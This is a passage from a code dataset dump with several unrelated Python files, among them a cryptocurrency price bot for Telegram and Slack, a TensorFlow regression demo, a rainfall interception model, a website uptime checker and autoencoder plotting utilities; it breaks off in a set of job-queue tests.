Try all or gatecoin for example')\n return\n messages = fx(underlying, exchange_list, cross_ccy)\n update.message.reply_text('\\n'.join(messages))\n\ndef inline_query(update, context):\n query = update.inline_query.query\n if not query:\n return\n logger.info(\"Inline query received from %s: %s\" % (update.inline_query.from_user, query))\n results = list()\n query_type = query.split()[0]\n messages = [BOTNAME]\n if query_type.lower() == 'price':\n if query.split().__len__() <= 2:\n return\n underlying = query.split()[1].upper()\n exchange_list = query.split()[2:]\n if exchange_list == []:\n return\n messages.extend(price(underlying, exchange_list))\n elif query_type.lower() == 'list':\n messages.append(list_text())\n else:\n messages.append('Try ' + BOTNAME + ' price bitcoin bitfinex, or ' + BOTNAME + ' list')\n reply_text = '\\n'.join(messages)\n results.append(InlineQueryResultArticle(id=uuid4(), title='Enter to display results', input_message_content=InputTextMessageContent(reply_text)))\n context.bot.answer_inline_query(update.inline_query.id, results)\n\ndef error(update, context):\n logger.warning('Update \"%s\" caused error \"%s\"' % (update, context.error))\n\ndef main_telegram():\n # Create the EventHandler and pass it to the bot's token\n updater = Updater(token=TOKEN, use_context=True)\n\n # Get the dispatcher to register handlers\n dispatcher = updater.dispatcher\n\n # Add handlers\n start_handler = CommandHandler('start', startMsg)\n list_exchanges_handler = CommandHandler('list', listExchangesMsg)\n price_handler = CommandHandler('price', priceMsg)\n fx_handler = CommandHandler('fx',fxMsg)\n exchange_handler = CommandHandler('exchange',exchangeMsg)\n summary_handler = CommandHandler('summary',summaryMsg)\n bitmex_handler = CommandHandler('bitmex', bitmexMsg)\n inline_query_handler = InlineQueryHandler(inline_query)\n dispatcher.add_handler(start_handler)\n dispatcher.add_handler(list_exchanges_handler)\n dispatcher.add_handler(price_handler)\n dispatcher.add_handler(fx_handler)\n dispatcher.add_handler(exchange_handler)\n dispatcher.add_handler(summary_handler)\n dispatcher.add_handler(bitmex_handler)\n dispatcher.add_handler(inline_query_handler)\n\n unknown_handler = MessageHandler(Filters.text, unknownMsg)\n dispatcher.add_handler(unknown_handler)\n\n # log all errors\n dispatcher.add_error_handler(error)\n\n # start the bot\n logger.info(\"Starting bot.\")\n updater.start_polling()\n\n # The above runs the bot until CTRL-C or SIGINT, SIGTERM, or SIGABRT is\n # received. start_polling() is non-blocking and this will stop the bot\n # gracefully\n updater.idle()\n logger.info(\"Exiting bot.\")\n\ndef slack_parse_bot_commands(bot_id, slack_events):\n for event in slack_events:\n if event[\"type\"] == \"message\" and not \"subtype\" in event:\n matches = re.search(SLACK_MENTION_REGEX, event[\"text\"])\n user_id, message = (matches.group(1), matches.group(2).strip()) if matches else (None, None)\n if user_id == bot_id:\n return message, event[\"channel\"]\n return None, None\n\ndef slack_handle_command(client, command, channel):\n default_response = \"Not sure what you mean. 
Try:\\n *summary* \\n *fx* \\n *bitmex* \\n *price* \"\n response = None\n if command.lower().startswith(\"summary\"):\n if command.split().__len__() <= 1:\n ccy = ['globalsummary']\n else:\n ccy = command.split()[1:]\n response = '\\n'.join(summary(ccy))\n elif command.lower().startswith(\"fx\"):\n if command.split().__len__() <= 2:\n response = 'Syntax is \"*fx* \".\\nTry \"*fx* all eth\" to price your underlying on all supported exchanges with eth as the cross ccy.'\n else:\n underlying = command.split()[1].upper()\n exchange_list = command.split()[2]\n if command.split().__len__() >= 4:\n cross_ccy = command.split()[3].upper()\n else:\n if underlying[-3:].upper() == 'BTC' or underlying[:3].upper() == 'BTC':\n cross_ccy = 'USD'\n else:\n cross_ccy = 'BTC'\n if exchange_list == []:\n response = 'No exchange specified. Try all or gdax for example'\n else:\n messages = fx(underlying, exchange_list, cross_ccy)\n response = '\\n'.join(messages)\n elif command.lower().startswith(\"bitmex\"):\n if command.split().__len__()<=1:\n response = \"Syntax is *bitmex* . For example *bitmex* XBTM18\"\n else:\n futlist = command.upper().split()[1:]\n message_text = \"\"\n for i, fut in enumerate(futlist):\n message_text+=bitmex(fut)\n if i != len(futlist)-1:\n message_text+='\\n------------\\n'\n response = message_text\n elif command.lower().startswith(\"price\"):\n if command.split().__len__() <= 2:\n response = 'Syntax is \"*price* <...>\".\\nTry \"*price* all\" to price your underlying on all supported exchanges.'\n else:\n underlying = command.split()[1].upper()\n exchange_list = command.split()[2:]\n if exchange_list == []:\n exchange_list = ['all']\n messages = price(underlying, exchange_list)\n response = '\\n'.join(messages)\n client.api_call(\"chat.postMessage\",channel=channel,text=response or default_response)\n\ndef main_slack():\n # instantiate Slack client\n slack_client = slack.WebClient(SLACK_BOT_TOKEN)\n slack_bot_id = None\n # Constants\n RTM_READ_DELAY = 1 # 1 second delay between reading from RTM\n\n if slack_client.rtm_connect(with_team_state=False, auto_reconnect=True):\n logger.info(\"Slack Bot connected and running!\")\n # Read bot's user ID by calling Web API method `auth.test`\n slack_bot_id = slack_client.api_call(\"auth.test\")[\"user_id\"]\n while slack_client.server.connected is True:\n command, channel = slack_parse_bot_commands(slack_bot_id, slack_client.rtm_read())\n if command:\n slack_handle_command(slack_client, command, channel)\n time.sleep(RTM_READ_DELAY)\n else:\n logger.error(\"Connection failed. Exception traceback printed above\")\n\nif __name__ == '__main__':\n if len(sys.argv) > 1 and sys.argv[1].lower() == 'slack':\n main_slack()\n else:\n main_telegram()\n\n","sub_path":"examples/cryptohelper.py","file_name":"cryptohelper.py","file_ext":"py","file_size_in_byte":24692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"42657483","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 21 14:51:55 2013\n\n@author: cimatori\n\"\"\"\n\n# 1. General data parameters\n\n# File with processed data\nDataFile = '/home/cimatori/Analyses/Meteor18days/ProcessData/results/Output_data_detail.hdf'\n\n# Get data from these dates\nStart = 140.4\nEnd = 158.5\n\n# 2. Various plotting and saving parameters\n#Output directory\nOutDir = '/home/cimatori/Analyses/Meteor18days/Overturning/'\n# Time of detail plots\nDetStart = 146.57\nDetEnd = 146.59\n\n# Parameters for hdf file\nhdfopt = dict(dtype='float32', compression='gzip', fillvalue=-9.99e30)\n\n# number of points for smooting line plots\nnWin = 120*2\n# Number of points for vertically smooting N\nzWin = 4\n\n\n# 3. Parameters for overturning analysis\nStep = 10 # s subsampling time step to use for analysis\n","sub_path":"Meteor18days/Overturning/ConfigOverturning1.py","file_name":"ConfigOverturning1.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"169815704","text":"# -*- coding: utf-8 -*-\n# @Author: ShuaiYang\n# @Date: 2019-04-02 16:57:49\n# @Last Modified by: [ShuaiYang]\n# @Last Modified time: 2019-04-09 19:21:52\n# https://blog.csdn.net/dufufd/article/details/78931840\nimport tensorflow as tf\nprint(\"true data ->>\",4.8, 8.5, 10.4, 21.0, 25.3)\n\n# 创建变量 W 和 b 节点,并设置初始值\nW = tf.Variable([.1], dtype=tf.float32)\nb = tf.Variable([-.1], dtype=tf.float32)\n# 创建 x 节点,用来输入实验中的输入数据\nx = tf.placeholder(tf.float32)\n# 创建线性模型\nlinear_model = W*x + b\n \n# 创建 y 节点,用来输入实验中得到的输出数据,用于损失模型计算\ny = tf.placeholder(tf.float32)\n# 创建损失模型\nloss = tf.reduce_sum(tf.square(linear_model - y))\n \n# 创建 Session 用来计算模型\nsess = tf.Session()\ninit = tf.global_variables_initializer()\nsess.run(init)\nprint(sess.run(linear_model, {x: [1, 2, 3, 6, 8]}))\nprint(sess.run(loss, {x: [1, 2, 3, 6, 8], y: [4.8, 8.5, 10.4, 21.0, 25.3]}))\n\n\n# 给 W 和 b 赋新值\nfixW = tf.assign(W, [2.])\nfixb = tf.assign(b, [1.])\n# run 之后新值才会生效\nsess.run([fixW, fixb])\n# 重新验证损失值\nprint(sess.run(linear_model, {x: [1, 2, 3, 6, 8]}))\n\nprint(sess.run(loss, {x: [1, 2, 3, 6, 8], y: [4.8, 8.5, 10.4, 21.0, 25.3]}))\n\n# 创建一个梯度下降优化器,学习率为0.001\noptimizer = tf.train.GradientDescentOptimizer(0.001)\ntrain = optimizer.minimize(loss)\n \n# 用两个数组保存训练数据\nx_train = [1, 2, 3, 6, 8]\ny_train = [4.8, 8.5, 10.4, 21.0, 25.3]\n \n# 训练10000次\n# for i in range(10000):\n# sess.run(train, {x: x_train, y: y_train})\n \n# # 打印一下训练后的结果\n# print('W: %s b: %s loss: %s' % (sess.run(W), sess.run(b), sess.run(loss, {x: x_train , y: y_train})))\n\n# # 重新验证损��值\n# print(\"重新验证损失值 - >\")\n# print(sess.run(linear_model, {x: [1, 2, 3, 6, 8]}))","sub_path":"netTestCode/testModel.py","file_name":"testModel.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"236329217","text":"# -*- coding: utf-8 -*-\nimport yaml\nimport os\nfrom models.dataset import Dataset\n\ndef load():\n datasets = dict()\n path = os.path.dirname(__file__) + \"/config/datasets.yaml\" \n\n with open(path, \"r\") as f:\n dsets = yaml.load(f)\n for d in dsets:\n datasets[d['id']] = Dataset(d['id'], d['name'], download_link=d.get('download_link'))\n return datasets","sub_path":"kartskrape/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"405236436","text":"from sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.datasets import load_iris\nfrom sklearn.cross_validation import KFold\nfrom matplotlib import pyplot as plt\nfrom matplotlib.colors import ListedColormap\nimport numpy as np\n\n\ndataset = load_iris()\n\nfeatures = dataset.data\nfeatur_names = list(dataset.feature_names)\ntarget = dataset.target\ntarget_names = list(dataset.target_names)\n\nmarkers = ['bo', 'rs', 'g^']\n\nfor t in range(3):\n plt.plot(features[target == t, 2], features[target == t, 0], markers[t], label=target_names[t])\nplt.grid(True)\nplt.legend()\nplt.show()\n\nclassifier = KNeighborsClassifier(n_neighbors=1)\nmean = []\n\nfor training, testing in KFold(len(features), n_folds=5, shuffle=True):\n classifier.fit(features[training], target[training])\n prediction = classifier.predict(features[testing])\n mean.append(np.mean(prediction == target[testing]))\n\nprint(\"Accuracy at every step: %s\" % ', '.join(['%s : %s' % (str(mean.index(i)), i) for i in mean]))\nprint(\"Average accuracy = %f\" % np.mean(mean))\nprint(\"Median accuracy = %f\" % np.median(mean))\n","sub_path":"knn/iris.py","file_name":"iris.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"639441983","text":"#epsabs=1.49e-06, epsrel=1.49e-06#精度\nimport numpy\nimport scipy.integrate\nimport matplotlib.pyplot\nfrom mpl_toolkits.mplot3d import Axes3D\nimport csv\n#initial_value:冠幅,间距,冠高,面积,宽,长,分段个数,R, B, H, square_dm, s_length, step_point, accept_p\ndef m_s(initial_value):\n accept_p = numpy.zeros(2)\n #基本参数设置\n R, B, H, S, length, step_point, accept_p[0], accept_p[1] = initial_value\n width = length\n V_square = S * H\n R2 = pow(R, 2)\n step_range = range(0, step_point, 1)#生成分割序列\n mode_limit = R + B / 2\n d_limit = mode_limit / (step_point - 1)#分割段长度\n rain_out = pow(mode_limit, 2) * H\n\n #四个树冠的圆心\n def canopy_center():#四个树冠的圆心\n canopy_center_point = numpy.zeros((4, 2))\n canopy_center_point[0][0] = 0\n canopy_center_point[0][1] = 0\n canopy_center_point[1][0] = 2 * R + B\n canopy_center_point[1][1] = 0\n canopy_center_point[2][0] = 2 * R + B\n canopy_center_point[2][1] = 2 * R + B\n canopy_center_point[3][0] = 0\n canopy_center_point[3][1] = 2 * R + B\n return canopy_center_point\n canopy_dot = canopy_center()#四个树冠的圆心\n #第i个树冠体积函数\n def f_canopy(i):#i=tree_num\n return lambda x, y: H - numpy.sqrt((x - canopy_dot[i][0]) ** 2 + (y - canopy_dot[i][1]) ** 2) * H / R\n #第i个树冠的上半圆函数\n def f_up_canopy(i):#i=tree_num\n return lambda x: canopy_dot[i][1] + numpy.sqrt(R2 - (x - canopy_dot[i][0]) ** 2)#上半圆函数\n #第i个树冠的下半圆函数\n def f_down_canopy(i):#i=tree_num\n return lambda x: canopy_dot[i][1] - numpy.sqrt(R2 - (x - canopy_dot[i][0]) ** 2)#下半圆函数\n #生成水槽中心点数组,第一维:某点的穿透雨量、X轴坐标、Y轴坐标,第二维X轴定值的Y轴点集合,第三维X轴的集合\n ucs = numpy.zeros((step_point, step_point, 3))#中心点数组:截留量、X、Y坐标\n #对水槽中心点数组赋值X、Y坐标\n for i in step_range:#对水槽中心点数组赋值X、Y坐标\n for j in step_range:\n ucs[i][j][1] = d_limit * i\n ucs[i][j][2] = d_limit * j\n #赋值:xa,xb,2个ab交点,2个cd焦点和圆左右边界 的X轴坐标集合,8个数,分段积分:7段\n def intersection_point_sequence(tree, rec_arr):\n r_i_s_get = numpy.zeros(8)\n r_i_s_get[0] = rec_arr[0][0]#长方形xa\n r_i_s_get[1] = rec_arr[1][0]#长方形xb\n r_i_s_get[2] = rec_arr[0][0] # 长方形ab的第一个交点\n r_i_s_get[3] = rec_arr[0][0] # 长方形ab的第二个交点\n r_i_s_get[4] = rec_arr[0][0] # 长方形cd的第一个交点\n r_i_s_get[5] = rec_arr[0][0] # 长方形cd的第二个交点\n r_i_s_get[6] = canopy_dot[tree][0] - R#树冠左边界\n r_i_s_get[7] = canopy_dot[tree][0] + R#树冠右边界\n #ab与树冠圆心距离的绝对值\n y_ab = abs(canopy_dot[tree][1] - rec_arr[0][1])\n #cd与树冠圆心距离的绝对值\n y_cd = abs(canopy_dot[tree][1] - rec_arr[3][1])\n if y_ab < R:\n # 长方形ab的第一个交点\n r_i_s_get[2] = canopy_dot[tree][0] - numpy.sqrt(R2 - y_ab ** 2)\n # 长方形ab的第二个交点\n r_i_s_get[3] = canopy_dot[tree][0] + numpy.sqrt(R2 - y_ab ** 2)\n if y_cd < R:\n # 长方形cd的第一个交点\n r_i_s_get[4] = canopy_dot[tree][0] - numpy.sqrt(R2 - y_cd ** 2)\n # 长方形cd的第二个交点\n r_i_s_get[5] = canopy_dot[tree][0] + numpy.sqrt(R2 - y_cd ** 2)\n return sorted(r_i_s_get)#排升序\n #对各长方形4个点赋值,并求与4个树冠相交部分的截留量\n for one_dimensional in ucs:#第一维\n for two_dimensional in one_dimensional:#第二维\n suqare = numpy.zeros((4, 2)) # 生成长方形4个点的数组\n canopy_interception = numpy.zeros(4) # 4个树冠的截留量\n half_width = width / 2\n half_length = length / 2\n suqare[0][0] = two_dimensional[1] - half_width#xa\n suqare[0][1] = two_dimensional[2] - half_length#ya\n suqare[1][0] = two_dimensional[1] + half_width#xb\n suqare[1][1] = two_dimensional[2] - half_length#yb\n suqare[2][0] = two_dimensional[1] + half_width#xc\n suqare[2][1] = two_dimensional[2] + half_length#yc\n suqare[3][0] = two_dimensional[1] - half_width#xd\n suqare[3][1] = two_dimensional[2] + half_length#yd\n #xa,xb,2个ab交点,2个cd焦点,R的集合,分段积分-6段\n for tree in range(0, 4, 1):\n #第i个树冠的分段截留量\n rain_i = numpy.zeros(7)\n #交点赋值\n s_i_s = 
intersection_point_sequence(tree, suqare)\n left_limit = max(suqare[0][0], canopy_dot[tree][0] - R)\n right_limit = min(suqare[1][0], canopy_dot[tree][0] + R)\n for i in range(0, 7, 1):\n if left_limit <= s_i_s[i] < s_i_s[i+1] <= right_limit:\n a = s_i_s[i]\n b = s_i_s[i + 1]\n midpoint_x = (a + b) / 2\n canopy_mid_down_y = f_down_canopy(tree)(midpoint_x)\n canopy_mid_up_y = f_up_canopy(tree)(midpoint_x)\n if canopy_mid_down_y >= suqare[3][1] or canopy_mid_up_y <= suqare[0][1]:\n continue\n if canopy_mid_down_y > suqare[0][1]:\n func_g = f_down_canopy(tree)\n else:\n func_g = suqare[0][1]\n if canopy_mid_up_y < suqare[3][1]:\n func_h = f_up_canopy(tree)\n else:\n func_h = suqare[3][1]\n rain_i[i] = scipy.integrate.dblquad(f_canopy(tree), a, b, func_g, func_h,\n epsabs=1.49e-06, epsrel=1.49e-06)[0]\n canopy_interception[tree] = numpy.sum(numpy.abs(rain_i))\n two_dimensional[0] = 100 * (V_square - numpy.sum(canopy_interception))/V_square\n #生成X,Y的集合\n # ucs_x = numpy.linspace(0, mode_limit, step_point)\n # ucs_y = numpy.linspace(0, mode_limit, step_point)\n # UX, UY = numpy.meshgrid(ucs_x, ucs_y)#meshgrid函数用两个坐标轴上的点在平面上画格\n #生成穿透雨量的二维矩阵,并赋值\n ucs_rain = numpy.zeros((step_point, step_point))\n #ucs_rain_T = numpy.zeros(step_point, step_point)\n square_p_num = 0\n for i in step_range:#第一维\n for j in step_range:#第二维\n ucs_rain[j][i] = ucs[i][j][0]\n #ucs_rain_T[i][j] = ucs[i][j][0]\n if accept_p[0] < ucs[i][j][0] < accept_p[1]:\n square_p_num = square_p_num + 1\n return square_p_num\n# initial_value = [30, 10 ,50, 10, 10, 1, 36, [18.450429643955072, 27.67564446593261]]\n# print (m_r(initial_value))\n\n","sub_path":"throughfall rain mode/mode_rain_through_1rt/mode_square.py","file_name":"mode_square.py","file_ext":"py","file_size_in_byte":7167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"578081643","text":"import socket\r\nimport sys\r\nfrom time import sleep\r\nfrom url_db import Urls\r\nimport argparse\r\nimport winsound\r\n\r\nurls_db=Urls()\r\n\r\n#urls=['www.facebook.com','www.google.com','www.twitter.com','www.instagram.com','www.github.com']\r\n\r\ndef check(url):\r\n\r\n ndex=url.find('w.')\r\n short_url=url[ndex+2:].capitalize()\r\n while True:\r\n try:\r\n print(f\"Evaluating connection to {url}.... \")\r\n s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) # IPV4 , TCP\r\n s.settimeout(2)\r\n s.connect((url,80))\r\n s.close()\r\n print(f'{short_url} is up\\n')\r\n return 1\r\n sleep(1)\r\n except Exception:\r\n print(f'{short_url} is down\\n')\r\n return 0\r\n sleep(1)\r\n sys.exit(0)\r\n\r\n\r\ndef parse():\r\n parser=argparse.ArgumentParser()\r\n group = parser.add_mutually_exclusive_group()\r\n parser.add_argument(\"-e\",\"--execute\",help=\"Executes the script\",action=\"store_true\" )\r\n group.add_argument(\"-v\",\"--view_url\",help=\"View all the urls store in the database\",action=\"store_true\")\r\n group.add_argument(\"-a\",\"--add_url\",help=\"Add a url formatted as : www.url.domain\",action=\"store\")\r\n parser.add_argument(\"-i\",\"--interval\",help=\"Choose the interval of the program execution\",action=\"store\")\r\n group.add_argument(\"-d\",\"--delete\",help=\"Delete a url from the database ; specify the url formatted as : www.url.domain\",action=\"store\")\r\n\r\n args=parser.parse_args()\r\n\r\n command=args.execute\r\n interval=args.interval\r\n if args.execute:\r\n get_urls=urls_db.view_urls()\r\n while True:\r\n for i in range(int(urls_db.count_rows()[0][0])):\r\n current_status=check(get_urls[i][0])\r\n if current_status==1:\r\n urls_db.cur.execute(\"UPDATE urls SET curS=? WHERE url=?\",(1,get_urls[i][0]))\r\n urls_db.con.commit()\r\n if urls_db.status_changed(get_urls[i][0]):\r\n notify()\r\n elif current_status==0:\r\n urls_db.cur.execute(\"UPDATE urls SET curS=? WHERE url=?\",(0,get_urls[i][0]))\r\n urls_db.con.commit()\r\n if urls_db.status_changed(get_urls[i][0]):\r\n notify()\r\n urls_db.update_status(get_urls[i][0])\r\n if interval is not None:\r\n sleep(int(interval))\r\n else:\r\n sleep(5)\r\n elif args.view_url:\r\n get_urls=urls_db.view_urls()\r\n #print(get_urls)\r\n\r\n elif args.add_url:\r\n urls_db.insert_url(args.add_url)\r\n\r\n elif args.delete:\r\n urls_db.delete(args.delete)\r\n\r\ndef notify():\r\n duration=1000 #milliseconds\r\n freq=440 #hz\r\n winsound.Beep(duration,freq)\r\n\r\nif __name__=='__main__':\r\n parse()\r\n\r\n\r\n#for url in urls:\r\n #urls_db.insert_url(url)\r\n\r\n#urlview=urls_db.view_table()\r\n#get_urls=urls_db.view_urls()\r\n#print(get_urls)\r\n#for i in range (5):\r\n# check(get_urls[i][0])\r\n#for url in urlview\r\n","sub_path":"connection_check/conn_check.py","file_name":"conn_check.py","file_ext":"py","file_size_in_byte":3048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"298997317","text":"from tensorflow.keras.preprocessing.image import load_img, img_to_array, array_to_img\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport numpy as np\nimport random as random\nimport math as math\nimport copy\nfrom PIL import Image\nfrom os import listdir, mkdir\nfrom os.path import isdir, isfile, join\n\n\ndef emptyFile(filePath):\n fileToEmpty = open(filePath, 'w')\n fileToEmpty.write('')\n fileToEmpty.close()\n\n\ndef getPrecentText(subCount, totalCount):\n return \"{:.2f}%\".format(100 * (subCount / totalCount))\n\n\ntempOutputFile = None\ndef saveModelSummary(model, outputFilePath):\n def writeLineToOutputFile(line):\n tempOutputFile.write(line + '\\n')\n emptyFile(outputFilePath)\n tempOutputFile = open(outputFilePath, 'a')\n model.summary(print_fn=writeLineToOutputFile)\n tempOutputFile.close()\n\n\ndef getNoisyVariants(originalImages, directoryPath):\n noisyImages = []\n # Either load from a file, or create new ones\n if (isdir(directoryPath) and isfile(join(directoryPath, 'image_0.jpg'))):\n print('\\nUsing saved noisy images from: ' + directoryPath)\n fileNames = [fileName for fileName in listdir(directoryPath) if isfile(join(directoryPath, fileName))]\n for fileName in fileNames:\n filePath = directoryPath + '/' + fileName\n image = img_to_array(load_img(filePath, color_mode=\"grayscale\"))\n noisyImages.append(image)\n else: # If no save images were found, then generate new ones\n #mkdir(directoryPath)\n print('\\nAdding noise and saving to: ' + directoryPath)\n imageCount = len(originalImages)\n imageIndex = 0\n # Copy the images so we don't overwrite anything\n copiesOfOriginalImages = []\n for originalImage in originalImages:\n copiesOfOriginalImages.append(copy.deepcopy(originalImage))\n # Add gaussian noise to each image\n for originalImage in copiesOfOriginalImages:\n image = originalImage.reshape((28, 28))\n gaussianMask = np.random.normal(0.0, 1.0, (28, 28))\n for x in range(28):\n for y in range(28):\n image[x, y] = np.average([image[x, y], gaussianMask[x][y]], weights=[1, 1])\n image = image.reshape((28, 28, 1))\n array_to_img(image).save(directoryPath + '/image_' + str(imageIndex) + '.jpg')\n noisyImages.append(image)\n imageIndex += 1\n if (imageIndex % math.floor(imageCount / 20) == 0):\n print('Completed ' + str(imageIndex) + ' of ' + str(imageCount) + ' images.')\n return np.array(noisyImages)\n\n\ndef plotTrainAndTestLoss(trainLoss, testLoss, filePath):\n plt.figure()\n plt.xlabel('epochs')\n plt.ylabel('loss')\n plt.ylim([0, 1])\n plt.plot(trainLoss, color='#FF0000', label='Trainning Data')\n plt.plot(testLoss, color='#0000FF', label='Test Data')\n plt.legend()\n plt.savefig(filePath)\n\n\ndef printSomeAutoencoderSamples(autoencoder, testImages, expectedImages=None, filePath='output/autoencoder_samples.jpg'):\n # Figure out the plot configuration\n subplotRowCount = 2\n if (expectedImages is not None):\n subplotRowCount = 3\n fig, subplots = plt.subplots(subplotRowCount, 4)\n\n # Print a few images\n for sampleIndex in range(4):\n # Get the input image\n imageIndex = random.randint(0, len(testImages) - 1)\n rawInputImage = testImages[imageIndex]\n printableInputImage = rawInputImage.reshape((28, 28))\n\n # Get the output image\n rawOutputImage = autoencoder.predict(np.array([rawInputImage]))[0]\n printableOutputImage = rawOutputImage.reshape((28, 28))\n\n # Add the input and output images to the figure\n subplots[0, sampleIndex].axis('off')\n subplots[0, sampleIndex].title.set_text('Input ' + 
str(sampleIndex + 1))\n subplots[0, sampleIndex].imshow(printableInputImage, cmap=plt.get_cmap('gray'))\n subplots[1, sampleIndex].axis('off')\n subplots[1, sampleIndex].title.set_text('Output ' + str(sampleIndex + 1))\n subplots[1, sampleIndex].imshow(printableOutputImage, cmap=plt.get_cmap('gray'))\n if (expectedImages is not None):\n printableExpectedImage = expectedImages[imageIndex].reshape((28, 28))\n subplots[2, sampleIndex].axis('off')\n subplots[2, sampleIndex].title.set_text('Expected ' + str(sampleIndex + 1))\n subplots[2, sampleIndex].imshow(printableExpectedImage, cmap=plt.get_cmap('gray'))\n plt.savefig(filePath)\n\n\ndef plotABunchOfEncoderSamplesForEachFashionClass(encode, testImages, testClassLabels, filePath):\n plt.figure()\n colorsByClass = getADiverseSetOfColor(10)\n maxX = 0.1\n maxY = 0.1\n\n # Sort the test images by class\n testImagesByClass = [[] for _ in range(10)]\n for testImageIndex in range(len(testImages)):\n testImage = testImages[testImageIndex]\n classIndex = testClassLabels[testImageIndex]\n testImagesByClass[classIndex].append(testImage)\n\n # Pick a few hundered random images from each class\n imagesToPlotByClass = [[] for _ in range(10)]\n for classIndex in range(10):\n imagesInThisClass = testImagesByClass[classIndex]\n numberOfImagesInThisClass = len(imagesInThisClass)\n for _ in range(250):\n imageIndex = random.randint(0, numberOfImagesInThisClass - 1)\n imagesToPlotByClass[classIndex].append(imagesInThisClass[imageIndex])\n\n # Encode the images\n pointsByClass = encode(np.array(imagesToPlotByClass))\n \n # Plot a bunch of samples for each class\n for classIndex in range(10):\n points = pointsByClass[classIndex]\n pointsX = [point[0] for point in points]\n pointsY = [point[1] for point in points]\n maxX = np.max([maxX, np.max(pointsX)])\n maxY = np.max([maxY, np.max(pointsY)])\n plt.scatter(pointsX, pointsY, color=colorsByClass[classIndex], s=3)\n\n # Add some extra configuration to the plot\n plt.xlim([0, 0.1 + (maxX * 1.5)]) # Leave some space for the legend\n plt.ylim([0, 0.1 + (maxY * 1.1)])\n print('max x: ' + str(maxX) + ', max y: ' + str(maxY))\n plt.legend(\n handles=[\n mpatches.Patch(color=colorsByClass[0], label='T-shirt/top'),\n mpatches.Patch(color=colorsByClass[1], label='Trouser'),\n mpatches.Patch(color=colorsByClass[2], label='Pullover'),\n mpatches.Patch(color=colorsByClass[3], label='Dress'),\n mpatches.Patch(color=colorsByClass[4], label='Coat'),\n mpatches.Patch(color=colorsByClass[5], label='Sandal'),\n mpatches.Patch(color=colorsByClass[6], label='Shirt'),\n mpatches.Patch(color=colorsByClass[7], label='Sneaker'),\n mpatches.Patch(color=colorsByClass[8], label='Bag'),\n mpatches.Patch(color=colorsByClass[9], label='Ankle boot'),\n ],\n loc='upper right')\n plt.savefig(filePath)\n\n\ndef getADiverseSetOfColor(colorCount):\n BRIGHTNESS = 200\n RED_THRESHOLD = BRIGHTNESS\n GREEN_THRESHOLD = BRIGHTNESS * 2\n BLUE_THRESHOLD = BRIGHTNESS * 3\n COLOR_STEP = (BRIGHTNESS * 3) / colorCount\n\n # Spread out the colors\n colors = [None for i in range(colorCount)]\n for i in range(colorCount):\n colorAsNumber = math.floor(i * COLOR_STEP)\n if (0 <= colorAsNumber < RED_THRESHOLD):\n colorTuple = (RED_THRESHOLD - colorAsNumber, colorAsNumber, 0)\n elif (RED_THRESHOLD <= colorAsNumber < GREEN_THRESHOLD):\n colorTuple = (0, GREEN_THRESHOLD - colorAsNumber, colorAsNumber - RED_THRESHOLD)\n else:\n colorTuple = (colorAsNumber - GREEN_THRESHOLD, 0, BLUE_THRESHOLD - colorAsNumber)\n # Convert to hexcode\n colors[i] = '#%02x%02x%02x' % 
colorTuple\n\n return colors\n","sub_path":"Melchiah/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"421680056","text":"from datetime import datetime, timedelta\n\nfrom limpyd import fields\n\nfrom limpyd_jobs.models import Queue, Job, Error\nfrom limpyd_jobs import STATUSES\n\nfrom .base import LimpydBaseTest\n\n\nclass QueuesTest(LimpydBaseTest):\n\n def count_queues(self):\n return len(Queue.collection())\n\n def test_non_existing_queue_could_be_created(self):\n count_before = self.count_queues()\n Queue.get_queue(name='test')\n count_after = self.count_queues()\n self.assertEqual(count_after, count_before + 1)\n\n def test_existing_queue_should_be_returned(self):\n # create one\n Queue.get_queue(name='test')\n # and get it\n count_before = self.count_queues()\n Queue.get_queue(name='test')\n count_after = self.count_queues()\n self.assertEqual(count_after, count_before)\n\n def test_get_keys_should_return_all_keys_for_a_name(self):\n # create two with the same name and different priorities\n q0 = Queue.get_queue(name='test', priority=0)\n q1 = Queue.get_queue(name='test', priority=1)\n # and one with a different name\n qx = Queue.get_queue(name='foobar')\n\n # test we can get all keys for 'test', ordered by priority desc\n keys = Queue.get_keys('test')\n self.assertEqual(keys, [q1.waiting.key, q0.waiting.key])\n\n # tests for foobar\n keys = Queue.get_keys('foobar')\n self.assertEqual(keys, [qx.waiting.key])\n\n # tests for non existing name\n keys = Queue.get_keys('qux')\n self.assertEqual(keys, [])\n\n def test_extended_queue_can_accept_other_fields(self):\n class ExtendedQueue(Queue):\n namespace = 'test-queuestest'\n foo = fields.StringField()\n bar = fields.StringField()\n\n # create a new queue\n queue = ExtendedQueue.get_queue(name='test', priority=1, foo='FOO', bar='BAR')\n self.assertEqual(queue.foo.get(), 'FOO')\n self.assertEqual(queue.bar.get(), 'BAR')\n\n # get the same queue, extended fields won't be updated\n queue = ExtendedQueue.get_queue(name='test', priority=1, foo='FOO2', bar='BAR2')\n self.assertEqual(queue.foo.get(), 'FOO')\n self.assertEqual(queue.bar.get(), 'BAR')\n\n\nclass JobsTests(LimpydBaseTest):\n\n def assert_job_status_and_priority(self, job, status, priority):\n job_status, job_priority = job.hmget('status', 'priority')\n self.assertEqual(job_status, status)\n self.assertEqual(job_priority, priority)\n\n def test_adding_a_job_should_create_a_queue_with_the_job(self):\n job = Job.add_job(identifier='job:1', queue_name='test', priority=5)\n\n # count queues\n keys = Queue.get_keys('test')\n 